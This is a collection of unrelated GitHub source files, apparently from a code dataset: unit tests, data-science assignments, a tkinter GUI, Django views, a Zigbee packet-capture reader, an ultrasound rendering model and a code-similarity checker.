self.assertIn(\"my_number\", reviewModel.to_dict())\r\n\r\n def 
test_to_dict_datetime_attributes_are_strs(self):\r\n        reviewModel = Review()\r\n        review_dictn = reviewModel.to_dict()\r\n        self.assertEqual(str, type(review_dictn[\"id\"]))\r\n        self.assertEqual(str, type(review_dictn[\"created_at\"]))\r\n        self.assertEqual(str, type(review_dictn[\"updated_at\"]))\r\n\r\n    def test_to_dict_output(self):\r\n        date_today = datetime.today()\r\n        reviewModel = Review()\r\n        reviewModel.id = \"123456\"\r\n        reviewModel.created_at = reviewModel.updated_at = date_today\r\n        tdict = {\r\n            'id': '123456',\r\n            '__class__': 'Review',\r\n            'created_at': date_today.isoformat(),\r\n            'updated_at': date_today.isoformat(),\r\n        }\r\n        self.assertDictEqual(reviewModel.to_dict(), tdict)\r\n\r\n    def test_contrast_to_dict_dunder_dict(self):\r\n        reviewModel = Review()\r\n        self.assertNotEqual(reviewModel.to_dict(), reviewModel.__dict__)\r\n\r\n    def test_to_dict_with_arg(self):\r\n        reviewModel = Review()\r\n        with self.assertRaises(TypeError):\r\n            reviewModel.to_dict(None)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    unittest.main()\r\n","repo_name":"Kwenziwa/AirBnB_clone","sub_path":"tests/test_models/test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"17050849410","text":"from spacy.tokens import Doc, Span\n\n# Data Example\ndata = {\n    \"words\": [\"Hello\", \"world\", \"!\"],\n    \"spaces\":[True, False, False],\n    \n    \"spans\":[\n        {\"label\":\"GREETING\", \"index\":(0, 2)}\n    ]\n}\n\n# Document\ndef DocumentCreate(nlp: object, data: dict) -> object:\n    # doc\n    doc = Doc(nlp.vocab, words=data[\"words\"], spaces=data[\"spaces\"])\n\n    # spans (collect first and assign once; assigning doc.ents inside the loop would overwrite earlier spans)\n    spans = []\n    for s in data[\"spans\"]:\n        spans.append(Span(doc, s[\"index\"][0], s[\"index\"][1], label=s[\"label\"]))\n    doc.ents = spans\n\n    return doc","repo_name":"LNMMusic/nlp","sub_path":"app/handlers/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"38484901217","text":"class Solution:\n    def largestPerimeter(self, A: List[int]) -> int:\n        perimeter = 0\n        A.sort()\n        A.reverse()\n        i=0\n        j=1\n        k=2\n        for i in range(len(A)):\n            if(j<len(A) and k<len(A) and (A[i]+A[j]>A[k]) and (A[i]+A[k]>A[j]) and (A[k]+A[j]>A[i])):\n                if(A[i]+A[j]+A[k] >= perimeter):\n                    perimeter =A[i]+A[j]+A[k]\n            j+=1\n            k+=1 \n        return perimeter\n","repo_name":"NahusenayH/ComptetiveProgramming","sub_path":"take1/D6/largestPerimeter.py","file_name":"largestPerimeter.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"584000888","text":"import sys\r\ntmp_in = sys.stdin #save a reference to sys.stdin\r\nf = open(r\"file.txt\", \"r\") #open the file for reading\r\nsys.stdin = f #redirect standard input\r\n\r\nwhile True:\r\n    try:\r\n        line = input() #read a line from the file\r\n        print(line) #print the line\r\n    except EOFError: #if the end of the file is reached\r\n        break #exit the loop\r\nsys.stdin = tmp_in #restore standard input\r\nf.close()\r\n\r\n","repo_name":"codekalser/PyQt5-Educational-Listings-","sub_path":"Prohorenok_ex31_Перенаправление потока ввода.py","file_name":"Prohorenok_ex31_Перенаправление потока ввода.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"37326522587","text":"import tkinter as tk\n\ndef update_button_texts():\n    with open('button_data.txt', 'r') as 
file:\n button_texts = file.readlines()\n button_texts = [text.strip() for text in button_texts]\n for i in range(5):\n buttons[i].config(text=button_texts[i])\n\ndef button_click(index):\n print(buttons[index]['text'])\n\nroot = tk.Tk()\nroot.title(\"Button GUI\")\n\n# Array of buttons\nbuttons = []\n\nfor i in range(5):\n button = tk.Button(root, text='Button ' + str(i+1), command=lambda index=i: button_click(index))\n button.pack()\n buttons.append(button)\n\n# Update button texts initially\nupdate_button_texts()\n\n# Function to update button texts periodically\ndef update_periodically():\n update_button_texts()\n root.after(1000, update_periodically) # Update every 1 second (adjust as needed)\n\n# Start updating button texts periodically\nupdate_periodically()\n\nroot.mainloop()\n","repo_name":"D3vq/ASL-sign-to-text","sub_path":"q.py","file_name":"q.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14705088712","text":"import logging\nfrom typing import List\n\nfrom rxnmapper import RXNMapper # noqa\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\ndef map_reactions(mapper: RXNMapper, reactions: List[str]) -> List[str]:\n \"\"\"Map multiple reaction SMILES.\n This function may raise exceptions, typically if the number of tokens is\n larger than 512.\"\"\"\n chunk_results = mapper.get_attention_guided_atom_maps(\n reactions, canonicalize_rxns=True\n )\n resulting_smiles = [result[\"mapped_rxn\"] for result in chunk_results]\n return resulting_smiles\n\n\ndef map_reactions_with_error_handling(\n mapper: RXNMapper, reactions: List[str]\n) -> List[str]:\n \"\"\"\n Map multiple reaction SMILES.\n When there is an error, the reactions will be mapped one by one, and the\n one causing the error will be replaced by an empty reaction, \">>\".\n \"\"\"\n try:\n return map_reactions(mapper, reactions)\n except Exception:\n logger.warning(\n f\"Error while mapping chunk of {len(reactions)} reactions. 
\"\n \"Mapping them individually.\"\n )\n\n mapped_reactions = []\n for reaction in reactions:\n try:\n mapped_reaction = map_reactions(mapper, [reaction])[0]\n except Exception as e:\n logger.info(\n f\"Reaction causing the error: {reaction}; \"\n f\"{e.__class__.__name__}: {e}\"\n )\n mapped_reaction = \">>\"\n mapped_reactions.append(mapped_reaction)\n return mapped_reactions\n","repo_name":"rxn4chemistry/disconnection_aware_retrosynthesis","sub_path":"src/dar/aam.py","file_name":"aam.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"76"} +{"seq_id":"8076326077","text":"import pyshark\n\ndef print_all_packets(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path)\n for packet in capture:\n print(packet)\n\nif __name__ == \"__main__\":\n pcap_file_path = \"ieee802154_on.pcap\"\n print_all_packets(pcap_file_path)\n \n \n \"\"\"\n \n import logging\nlogging.basicConfig(level=logging.DEBUG)\nimport pyshark\nimport sys\n\n\ndef delve_into_zigbee_communication(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path, display_filter=\"wpan\")\n zigbee_packets = []\n\n for packet in capture:\n if hasattr(packet, \"wpan\") and hasattr(packet.wpan, \"zigbee\"):\n zigbee_packets.append(packet)\n logging.debug(f\"Captured Zigbee packet: {packet}\")\n\n capture.close()\n return zigbee_packets\n\ndef find_network_key(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path)\n\n for packet in capture:\n if hasattr(packet, 'wpan') and hasattr(packet.wpan, 'zigbee') and hasattr(packet.wpan.zigbee, 'nwk_key_descriptor'):\n return packet.wpan.zigbee.nwk_key_descriptor.network_key\n\n return None\n\ndef find_transport_key(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path)\n\n for packet in capture:\n if hasattr(packet, 'wpan') and hasattr(packet.wpan, 'zigbee') and hasattr(packet.wpan.zigbee, 'sec') and hasattr(packet.wpan.zigbee.sec, 'nwk_fc'):\n if int(packet.wpan.zigbee.sec.nwk_fc, 16) & 0b10:\n return packet.wpan.zigbee.sec.security_key\n\n return None\n\n\ndef count_zigbee_packets(pcap_file_path):\n capture = pyshark.FileCapture(pcap_file_path)\n zigbee_count = 0\n\n for packet in capture:\n if hasattr(packet, 'wpan') and hasattr(packet.wpan, 'zigbee'):\n zigbee_count += 1\n\n return zigbee_count\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Usage: python3 key.py \")\n sys.exit(1)\n\n pcap_file_path = sys.argv[1]\n delve_into_zigbee_communication(pcap_file_path)\n network_key = find_network_key(pcap_file_path)\n transport_key = find_transport_key(pcap_file_path)\n total_zigbee_packets = count_zigbee_packets(pcap_file_path)\n\n print(f\"Network Key: {network_key}\")\n print(f\"Transport Key: {transport_key}\")\n print(f\"Total Zigbee packets in the capture: {total_zigbee_packets}\")\n\n\n \n \"\"\"\n","repo_name":"ashok5141/Zigbee_Security","sub_path":"Capture and Analysis/Packets.py","file_name":"Packets.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"21899356587","text":"import requests\nfrom bs4 import BeautifulSoup\nimport subprocess\nfrom Bio import SeqIO\nfrom io import StringIO\nimport json\nimport numpy as np\nimport time\n\n\nwith open(\"/home/users/nus/e0969999/scratch/data/myfile.json\", \"r\") as file:\n trf_data = json.load(file)\n\nwith open(\"/home/users/nus/e0969999/scratch/data/ncbi_dict.json\",\"r\") as file:\n ncbi_data = 
json.load(file)\n\n# Counter variables\nmirbase_counter = 0\nensembl_counter = 0\nsequences_per_sleep = 1000 \n\ndef getMIRBaseSeq(id):\n global mirbase_counter\n id = id.replace('miRBase:', '')\n URL = \"https://www.mirbase.org/mature/\" + id\n page = requests.get(URL)\n soup = BeautifulSoup(page.content, \"html.parser\")\n sequence_td = soup.find('td', class_='row-title', text='Sequence')\n if sequence_td is None:\n return np.nan\n else:\n sequence = sequence_td.find_next_sibling('td').text.strip()\n mirbase_counter += 1\n if mirbase_counter % sequences_per_sleep == 0:\n time.sleep(5) \n return sequence\n\ndef getTRFdbSeq(id):\n id = id.replace('tRF-','')\n return trf_data.get(id, np.nan)\n\ndef getNCBISeq(id):\n id = id.replace('NCBI:', '')\n return ncbi_data.get(id, np.nan)\n \n '''\n command = f\"echo '{gene_id}' | source /home/users/nus/e0969999/scratch/ncbi.sh\"\n\n try:\n output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, text=True)\n output_file = StringIO(output)\n records = list(SeqIO.parse(output_file, \"fasta\"))\n if records:\n dna_sequence = str(records[0].seq)\n return dna_sequence\n else:\n return np.nan\n except subprocess.CalledProcessError as e:\n # Handle any errors that occur during script execution\n print(\"Error executing the script:\", e)\n '''\ndef getEnsemblSeq(id):\n global ensembl_counter\n id = id.replace('Ensembl:','')\n human = \"ENSG\"\n if human in id:\n server = \"https://rest.ensembl.org\"\n ext = \"/sequence/id/\" + id + \"?\"\n r = requests.get(server+ext, headers={ \"Content-Type\" : \"text/plain\"})\n ensembl_counter += 1\n if ensembl_counter % sequences_per_sleep == 0:\n time.sleep(5)\n return r.text\n else:\n return np.nan\n\ndef main():\n print(\"MIRNA:\" + getMIRBaseSeq('miRBase:MIMAT0000254'))\n print(\"tRF:\" + getTRFdbSeq('tRF-3001b'))\n print(\"NCBI:\" + getNCBISeq('NCBI:7291'))\n print(\"Ensembl:\" + getEnsemblSeq('Ensembl:ENSG00000266035'))\n\nif __name__ == '__main__':\n main()\n","repo_name":"R-Laksh/criGEM-NUS2023","sub_path":"ml models/GetSequences.py","file_name":"GetSequences.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"732141884","text":"from django.conf.urls import url, include\nfrom crud.views import home, estudiante_edit, estudiante_view, estudiante_delete\n#estudiante_view, estudiante_edit\n\n\nurlpatterns = [\n\turl(r'^nuevo$', estudiante_view, name='estudiante_crear'),\n\turl(r'^editar/([0-9]+)/$', estudiante_edit, name='estudiante_editar'),\n\turl(r'^eliminar/([0-9]+)/$',estudiante_delete, name='estudiante_eliminar'),\n]","repo_name":"luissalgado9/estudiantes","sub_path":"crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16312804937","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Lasso,LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.metrics.regression import r2_score\nfrom sklearn.tree import DecisionTreeClassifier\n#from adspy_shared_utilities import plot_feature_importances\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import validation_curve\n\nnp.random.seed(0)\nn = 15\nx = np.linspace(0,10,n) + np.random.randn(n)/5\ny = np.sin(x)+x/6 + np.random.randn(n)/10\n\n\nX_train, X_test, 
y_train, y_test = train_test_split(x, y, random_state=0)\n\n# You can use this function to help you visualize the dataset by\n# plotting a scatterplot of the data points\n# in the training and test sets.\ndef part1_scatter():\n plt.figure()\n plt.scatter(X_train, y_train, label='training data')\n plt.scatter(X_test, y_test, label='test data')\n plt.legend(loc=4);\n\n\n# NOTE: Uncomment the function below to visualize the data, but be sure\n# to **re-comment it before submitting this assignment to the autograder**.\n#part1_scatter()\n\nx=x.reshape(-1,1)\ndef answer_one():\n a=[]\n for i in [1,3,6,9]:\n poly = PolynomialFeatures(degree=i)\n X_poly=poly.fit_transform(x)\n X_train, X_test, y_train, y_test = train_test_split(X_poly, y,\n random_state = 0)\n linreg = LinearRegression().fit(X_train, y_train)\n\n pred_data=np.linspace(0,10,100)\n pred_data=pred_data.reshape(-1,1)\n pred=linreg.predict(poly.fit_transform((pred_data)))\n a.append(pred)\n a=np.array(a)\n return a\n\nanswer_one()\n\n# feel free to use the function plot_one() to replicate the figure\n# from the prompt once you have completed question one\ndef plot_one(degree_predictions):\n plt.figure(figsize=(10,5))\n plt.plot(X_train, y_train, 'o', label='training data', markersize=10)\n plt.plot(X_test, y_test, 'o', label='test data', markersize=10)\n for i,degree in enumerate([1,3,6,9]):\n plt.plot(np.linspace(0,10,100), degree_predictions[i], alpha=0.8, lw=2, label='degree={}'.format(degree))\n plt.ylim(-1,2.5)\n plt.legend(loc=4)\n plt.show()\n\n#plot_one(answer_one())\n\ndef answer_two():\n r2_train=[]\n r2_test=[]\n for i in range(0,10):\n poly = PolynomialFeatures(degree=i)\n X_poly=poly.fit_transform(x)\n X_train, X_test, y_train, y_test = train_test_split(X_poly, y,\n random_state = 0)\n linreg = LinearRegression().fit(X_train, y_train)\n r2_train.append(linreg.score(X_train,y_train))\n r2_test.append(linreg.score(X_test,y_test))\n r2_test=np.array(r2_test)\n r2_train=np.array(r2_train)\n return (r2_train,r2_test)\nanswer_two()\n\ndef answer_three():\n r2_train,r2_test=answer_two()\n return (3,9,7)\nanswer_three()\n\ndef answer_four():\n poly = PolynomialFeatures(degree=12)\n X_poly=poly.fit_transform(x)\n X_train, X_test, y_train, y_test = train_test_split(X_poly, y,random_state = 0)\n linreg = LinearRegression().fit(X_train, y_train)\n r2_test1=linreg.score(X_test,y_test)\n\n poly = PolynomialFeatures(degree=12)\n X_poly=poly.fit_transform(x)\n X_train, X_test, y_train, y_test = train_test_split(X_poly, y,random_state = 0)\n linreg1 = Lasso(alpha=0.01,max_iter=10000).fit(X_train,y_train)\n r2_test2=linreg1.score(X_test,y_test)\n return (r2_test1,r2_test2)\nanswer_four()\n\nmush_df = pd.read_csv('mushrooms.csv')\nmush_df2 = pd.get_dummies(mush_df)\n\nX_mush = mush_df2.iloc[:,2:]\ny_mush = mush_df2.iloc[:,1]\n\n# use the variables X_train2, y_train2 for Question 5\nX_train2, X_test2, y_train2, y_test2 = train_test_split(X_mush, y_mush, random_state=0)\n\n# For performance reasons in Questions 6 and 7, we will create a smaller version of the\n# entire mushroom dataset for use in those questions. 
For simplicity we'll just re-use\n# the 25% test split created above as the representative subset.\n#\n# Use the variables X_subset, y_subset for Questions 6 and 7.\nX_subset = X_test2\ny_subset = y_test2\n\ndef answer_five():\n clf=DecisionTreeClassifier(random_state=0).fit(X_train2,y_train2)\n importance = pd.Series(clf.feature_importances_, index=X_train2.columns)\n importance=importance.sort_values(ascending=False)\n a=importance.iloc[0:5].index.tolist()\n return a\nanswer_five()\n\ndef answer_six():\n param_range = np.logspace(-4, 1, 6)\n train_scores, test_scores = validation_curve(SVC(kernel='rbf',C=1), X_subset, y_subset,param_name='gamma',param_range=param_range, cv=3)\n train_scores=np.mean(train_scores,axis=1)\n test_scores=np.mean(test_scores,axis=1)\n return (train_scores,test_scores)\nanswer_six()","repo_name":"manoj279/Machinelearning","sub_path":"Machinelearning/ass-2.py","file_name":"ass-2.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73212359605","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\n\nnp.set_printoptions(threshold=10_0000)\n\n\ndef gaussian_kernel(size: int, mean: float, std: float):\n delta_t = 1\n x_cos = np.array(list(range(-size, size+1)), dtype=np.float32)\n x_cos *= delta_t\n\n d1 = torch.distributions.Normal(mean, std*3)\n d2 = torch.distributions.Normal(mean, std)\n vals_x = d1.log_prob(torch.arange(-size, size+1, dtype=torch.float32)*delta_t).exp()\n vals_y = d2.log_prob(torch.arange(-size, size+1, dtype=torch.float32)*delta_t).exp()\n\n gauss_kernel = torch.einsum('i,j->ij', vals_x, vals_y)\n \n return gauss_kernel / torch.sum(gauss_kernel).reshape(1, 1)\n\n\ng_kernel = gaussian_kernel(3, 0., 1.)\n# g_kernel = torch.tensor(g_kernel[:, :, None, None], dtype=torch.float32)\ng_kernel = torch.tensor(g_kernel[None, None, :, :], dtype=torch.float32).to(device='cuda')\nprint(g_kernel)\n\n\n\ndef rendering(H, W, z_vals=None, attenuation_medium_map=None, refl_map=None,\nboundary_map=None, mu_0_map=None, mu_1_map=None, sigma_0_map=None):\n\n dists = torch.abs(z_vals[..., :-1, None] - z_vals[..., 1:, None]) # dists.shape=(W, H-1, 1)\n dists = dists.squeeze(-1) # dists.shape=(W, H-1)\n dists = torch.cat([dists, dists[:, -1, None]], dim=-1) # dists.shape=(W, H)\n\n attenuation = torch.exp(-attenuation_medium_map * dists)\n attenuation_total = torch.cumprod(attenuation, dim=1, dtype=torch.float32, out=None)\n\n attenuation_total = (attenuation_total - torch.min(attenuation_total)) / (torch.max(attenuation_total) - torch.min(attenuation_total))\n\n reflection_total = torch.cumprod(1. 
- refl_map * boundary_map, dim=1, dtype=torch.float32, out=None)\n reflection_total = reflection_total.squeeze(-1)\n reflection_total_plot = torch.log(reflection_total + torch.finfo(torch.float32).eps)\n\n texture_noise = torch.randn(W, H, dtype=torch.float32).to(device='cuda')\n scattering_probability = torch.randn(W, H, dtype=torch.float32).to(device='cuda')\n\n scattering_zero = torch.zeros(W, H, dtype=torch.float32).to(device='cuda')\n scatterers_map = torch.where(scattering_probability <= mu_0_map, \n texture_noise * sigma_0_map + mu_1_map, \n scattering_zero)\n\n psf_scatter_conv = torch.nn.functional.conv2d(input=scatterers_map[None, None, :, :], weight=g_kernel, stride=1, padding=\"same\")\n\n # psf_scatter_conv = torch.nn.functional.conv2d(input=scatterers_map[None, :, :, None], weight=g_kernel, stride=1, padding=1)\n\n psf_scatter_conv = psf_scatter_conv.squeeze()\n\n b = attenuation_total * psf_scatter_conv\n\n border_convolution = torch.nn.functional.conv2d(input=boundary_map[None, None, :, :], weight=g_kernel, stride=1, padding=\"same\")\n border_convolution = border_convolution.squeeze()\n\n r = attenuation_total * reflection_total * refl_map * border_convolution\n intensity_map = b + r\n intensity_map = intensity_map.squeeze()\n intensity_map = torch.clamp(intensity_map, 0, 1)\n\n return intensity_map, attenuation_total, reflection_total_plot, scatterers_map, scattering_probability, border_convolution, texture_noise, b, r\n\n\n\ndef get_rays_us_linear(W, sw, c2w):\n t = torch.Tensor(c2w[:3, -1])\n R = torch.Tensor(c2w[:3, :3])\n i = torch.arange(W, dtype=torch.float32)\n rays_o_x = t[0] + sw * i\n rays_o_y = torch.full_like(rays_o_x, t[1])\n rays = torch.stack([rays_o_x, rays_o_y, torch.ones_like(rays_o_x) * t[2]], -1) #x,y,z\n shift = torch.matmul(R, torch.tensor([25., 27.5, 0.], dtype=torch.float32)) * 0.001 #What are these constants????\n rays_o = rays - shift\n dirs = torch.stack([torch.zeros_like(rays_o_x), torch.ones_like(rays_o_x), torch.zeros_like(rays_o_x)], -1)\n rays_d = torch.sum(dirs[..., None, :] * R, -1)\n\n return rays_o.to(device='cuda'), rays_d.to(device='cuda')\n\n\ndef render_us(W, H, rays=None, near=0., far=100. * 0.001, \n attenuation_medium_map=None, refl_map=None, boundary_map=None,\n mu_0_map=None, mu_1_map=None, sigma_0_map=None):\n \"\"\"Render rays\n\n Args:\n H: int. Height of image in pixels.\n W: int. Width of image in pixels.\n rays: array of shape [2, batch_size, 3]. Ray origin and direction for\n each example in batch.\n c2w: array of shape [3, 4]. Camera-to-world transformation matrix.\n near: float or array of shape [batch_size]. Nearest distance for a ray.\n far: float or array of shape [batch_size]. 
Farthest distance for a ray.\n \"\"\"\n sw = 40 * 0.001 / float(W)\n c2w = np.eye(4)[:3,:4].astype(np.float32) # identity pose matrix\n\n if c2w is not None:\n # special case to render full image\n rays_o, rays_d = get_rays_us_linear(W, sw, c2w)\n else:\n # use provided ray batch\n rays_o, rays_d = rays\n\n\n # Create ray batch\n rays_o = torch.tensor(rays_o).view(-1, 3).float()\n rays_d = torch.tensor(rays_d).view(-1, 3).float()\n near, far = near * torch.ones_like(rays_d[..., :1]), far * torch.ones_like(rays_d[..., :1])\n\n rays = torch.cat([rays_o, rays_d, near, far], dim=-1)\n\n N_rays = rays.shape[0]\n rays_o, rays_d = rays[:, 0:3], rays[:, 3:6]\n\n t_vals = torch.linspace(0., 1., H).to(device='cuda')\n\n z_vals = t_vals.unsqueeze(0).expand(N_rays, -1) * 2\n\n ret_list = rendering(H, W, z_vals, attenuation_medium_map, refl_map, boundary_map, mu_0_map, mu_1_map, sigma_0_map) \n\n return ret_list \n\n","repo_name":"mfazampour/SS_Probe_Pose_Regression","sub_path":"ultrasound_rendering.py","file_name":"ultrasound_rendering.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35739159110","text":"from django.http.response import (JsonResponse, HttpResponse)\nfrom rest_framework.views import APIView\nimport json\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom .settings import BASE_DIR\n\n\nclass PatientReadmission(APIView):\n trained_columns = ['age', 'num_procedures', 'num_medications',\n 'num_diagnoses', 'admission_source_id_7', 'admission_source_id_1',\n 'admission_source_id_17', 'admission_source_id_4',\n 'admission_source_id_6', 'admission_source_id_2',\n 'admission_source_id_5', 'admission_source_id_9',\n 'admission_source_id_3', 'admission_type_id_1', 'admission_type_id_3',\n 'admission_type_id_2', 'admission_type_id_6', 'admission_type_id_5',\n 'race_type3', 'race_type1', 'race_type4', 'race_type5',\n 'days_in_hospital', 'gender_Male', 'max_glu_serum_>300',\n 'max_glu_serum_None', 'max_glu_serum_Norm', 'A1Cresult_>8',\n 'A1Cresult_None', 'A1Cresult_Norm', 'metformin_No', 'metformin_Steady',\n 'metformin_Up', 'repaglinide_No', 'repaglinide_Steady',\n 'repaglinide_Up', 'glimepiride_No', 'glimepiride_Steady',\n 'glimepiride_Up', 'glipizide_No', 'glipizide_Steady', 'glipizide_Up',\n 'glyburide_No', 'glyburide_Steady', 'glyburide_Up', 'pioglitazone_No',\n 'pioglitazone_Steady', 'pioglitazone_Up', 'rosiglitazone_No',\n 'rosiglitazone_Steady', 'rosiglitazone_Up', 'acarbose_Steady',\n 'acarbose_Up', 'tolazamide_Steady', 'insulin_No', 'insulin_Steady',\n 'insulin_Up', 'glyburide.metformin_Steady', 'glyburide.metformin_Up',\n 'change_No', 'diabetesMed_Yes']\n drop_columns = ['patientID', 'AdmissionID',\n 'weight', 'payer_code', 'medical_specialty',\n 'nateglinide', 'chlorpropamide', 'tolbutamide', 'acetohexamide',\n 'miglitol', 'troglitazone', 'glipizide.metformin', 'metformin.rosiglitazone',\n 'metformin.pioglitazone', 'Target', 'istrain']\n\n def post(self, request):\n data = pd.DataFrame(request.data)\n data = self.preprocess(data)\n model = pickle.load(open(BASE_DIR + r\"\\patient_readmission_api\\prediction_models\\patient_readmission_model\",\n 'rb'))\n predicted = model.predict_proba(data)\n return JsonResponse(status=200, data={'classes': model.classes_.tolist(),\n 'predictions': predicted.tolist()})\n\n def preprocess(self, data):\n # Creating days_in_hospital column\n data['days_in_hospital'] = (pd.to_datetime(data.Discharge_date) - pd.to_datetime(\n 
data.Admission_date)) / np.timedelta64(1, 'D')\n data.drop(['Admission_date', 'Discharge_date'], axis=1, inplace=True)\n # Creating age column\n age = data.age.str.split(\"-\", expand=True)\n data.age = (pd.to_numeric(age[0].str.replace(\"[\", \"\")) + pd.to_numeric(age[1].str.replace(\")\", \"\"))) / 2\n # pre-processing production data as done to training data\n data.drop(self.drop_columns, axis=1, inplace=True)\n categorical_columns = data.select_dtypes(['object']).columns\n data = pd.get_dummies(data, columns=categorical_columns[categorical_columns != 'Target'],\n prefix=categorical_columns[categorical_columns != 'Target'])\n for col in self.trained_columns:\n if col not in data.columns:\n data[col] = 0\n data = data[self.trained_columns]\n return data\n","repo_name":"Madhav2/ML-Training","sub_path":"patient_readmission/patient_readmission_api/patient_readmission_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2130920502","text":"#_*_encoding:utf-8_*_#\nfrom django.shortcuts import render\nfrom django.views.generic import View\n\n\nfrom models import Article\n\nfrom forms import ArticleForms\n\n# Create your views here.\n\n\nclass ArticleDetailView(View):\n def get(self,request,article_id):\n article=Article.objects.get(id=article_id)\n\n #找到上下两篇文章\n try:\n left_article=Article.objects.filter(add_time__gt=article.add_time).order_by('-add_time')[0]\n except:\n left_article=[]\n\n try:\n right_article=Article.objects.filter(add_time__lt=article.add_time).order_by('-add_time')[0]\n except:\n right_article=[]\n\n url_address=request.get_full_path()\n\n content=article.content.encode('utf-8')\n\n if article:\n return render(request,'detail.html',{\n 'article':article,\n 'article_id_again':article_id,\n 'left_article':left_article,\n 'right_article':right_article,\n 'url_address':url_address,\n 'content':content\n })\n\n\nclass AddArticleView(View):\n def get(self,request):\n return render(request,'add_article.html')\n\n def post(self, request):\n article_forms = ArticleForms(request.POST)\n if article_forms.is_valid():\n article=Article()\n title = request.POST.get('title', '')\n content = request.POST.get('content', '')\n\n article.title=title\n article.content=content\n\n article.save()\n\n return render(request,'index.html')\n\n","repo_name":"mimota1994/mimotablog","sub_path":"apps/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19434590218","text":"# 对比下载代码与选手提交代码\n\nimport os\nimport re\nimport shutil\nfrom ac.pre import get_yaml\n\nconfig = get_yaml()\n\n\ndef compare():\n print('\\n正在进行比较,即将得到结果...')\n\n file = open('result.txt', 'w')\n\n data_dir = 'data'\n user_dir = 'user'\n\n cpp = re.compile(r'.cpp')\n\n user_list = os.listdir(user_dir)\n for i in range(0, len(user_list)):\n user_problem_dir = os.path.join(user_dir, user_list[i])\n problem_id = os.path.basename(user_problem_dir)\n\n user_code_list = os.listdir(user_problem_dir)\n for j in range(0, len(user_code_list)):\n user_code_dir = os.path.join(user_problem_dir, user_code_list[j])\n user_name = os.path.basename(user_code_dir)\n user_name = cpp.sub('', user_name)\n\n data_list = os.listdir(data_dir)\n for k in range(0, len(data_list)):\n data_problem_dir = os.path.join(data_dir, data_list[k])\n if os.path.basename(data_problem_dir) != 
problem_id:\n continue\n\n data_code_list = os.listdir(data_problem_dir)\n for l in range(0, len(data_code_list)):\n data_code_dir = os.path.join(\n data_problem_dir, data_code_list[l])\n\n f = open(data_code_dir)\n code = f.read()\n f.close()\n data_name = re.search('url:(.+?):end', code).group(1)\n\n os.system('sim_c++ -p -o re.txt ' +\n user_code_dir+' '+data_code_dir)\n f = open('re.txt')\n res = f.read()\n f.close()\n result = re.search('consists for(.+?)% of', res)\n if result is None:\n continue\n result = int(result.group(1))\n if result >= config['sim_limit']:\n file.write(user_name+' submitted code for #'+str(problem_id)+' matching ' +\n data_name+' with similarity '+str(result)+'%\\n')\n\n file.close()\n os.remove('re.txt')\n shutil.rmtree('data')\n shutil.rmtree('user')\n return\n","repo_name":"Llf0703/Anti-Cheating","sub_path":"ac/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"}
